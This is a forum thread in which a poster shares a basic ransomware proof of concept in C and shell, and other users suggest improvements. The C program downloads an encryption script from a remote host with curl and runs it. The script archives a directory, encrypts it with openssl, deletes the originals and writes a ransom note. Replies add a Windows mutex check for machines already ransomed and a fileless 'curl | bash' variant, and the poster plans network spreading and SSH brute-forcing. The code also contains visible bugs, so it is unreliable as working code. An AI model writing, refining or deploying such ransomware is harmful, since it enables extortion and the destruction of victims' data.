Basic ransomware guide

Hey everyone. I think this is my first official thread although I’ve been a member for a while now. I’ve been doing some programming in C lately and wanted to write a ransomware POC. However this version is very basic. The next one will be able to spread throughout a network, and also use a dictionary attack or brutforce ssh logins. All of this is for educational purposes, don’t do anything dumb. More experienced malware coders please take a look and critique the code, I’d appreciate it.

The first part of the malware includes a few essential libraries. Next it checks to see if the OS is macOS, linux or windows. If it’s windows the program should fail immediately. (The next version of this program will work on windows.

#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>


 /*checks OS, fails if windows*/
void os_check(){
    #ifdef  _WIN32
        exit(1)
    
    #elif __APPLE__
            printf();
    
    #elif __LINUX__
        printf();
#endif

}

This next section checks to see if the host has already been infected. If so it fails automatically. Of course this to make sure the program doesn’t try infect a system it’s already compromised. Next, we create a pointer called *command. Then memory is allocated for it. Afterwards we pass a string to strcpy, which passes this to command. The command is then run by the system call, system(). If there’s a better way to do this please let me know. The commands are to download a shell script which encrypts the user’s file or directory using aes256.

There’s several other features I wanted to add however I need to read up on implementing them.


int infected(const char *filename){
    filename = "/tmp/worm.c";
    struct stat buffer;
    int exist = stat(filename,&buffer);
    if(exist == 0)
        exit(1);
    else
        return 0;

}

int main(void){
    
    char *command = malloc(60 * sizeof(char));

    strcpy(command, "cd /tmp && curl http://0.0.0.0:8000/encrypt.sh");
    system(command);
    strcpy(command, "./encrypt.sh");
}

Shell script


#compresses file using tar, encrypts with openssl using aes256 encryption
if [ $1!=$1 ]
then
    cd /tmp/test #use whatever directory
    tar -czvf test.tar.gz test
    openssl aes256 -salt -in test.tar.gz -out test.aes256 -d -pass pass:#password
    rm test.tar.gz
    rm -r test
    echo "All your files are encrypted!" > note.txt
fi 
9 Likes

It’s good that code is straight to the point, but the preprocessor macros only work in compile time. Shameless advertising but maybe using this trick could allow your program to run in Windows and Linux.

2 Likes

Thank you, I’ll take a look at your post, and it’s good advertising :slight_smile:

Also using name pipes or a mutex for checking the currently ransomed machines is usually how know if the process has either completed or hasn’t even started.

...
Handle h
#define SUS "Global\\NotSus"
#define TRUE 1
#define FALSE 0

static int exists() {
    int ret = FALSE;
    if ((h = CreateMutex(NULL, FALSE, SUS))) {
        DWORD error = GetLastError();
        if (error == ERROR_ALREADY_EXISTS) {
            CloseHandle(h);
            ret = TRUE;
        }
        if (error == ERROR_INVALID_HANDLE) {
            CloseHandle(h);
            fprintf(stderr, "ERROR: %s\n", "Invald handle");
            ret = FALSE;
        }
    }
    else {
        fprintf(stderr, "ERROR: Failed with 0x%x\n", GetLastError());
        return -1;
    }
    return ret;
}
3 Likes

Yea this will be useful, thanks. Never even thought about this.

How is this even relevant to this posting?

1 Like

bots bots bots are everywhere ignore them.

on clang on my comp __linux__ works __LINUX__ does not

1 Like

It seems that it’s just __linux__

2 Likes

is there any other way to check already infected machine?

1 Like

Can you not scroll up?

2 Likes

I feel so confident about this code by the way!

1 Like

A simpler way to avoid touch on disk and allocation just do:

system("curl http://0.0.0.0:8000/encrypt.sh | bash");

2 Likes

This topic was automatically closed after 121 days. New replies are no longer allowed.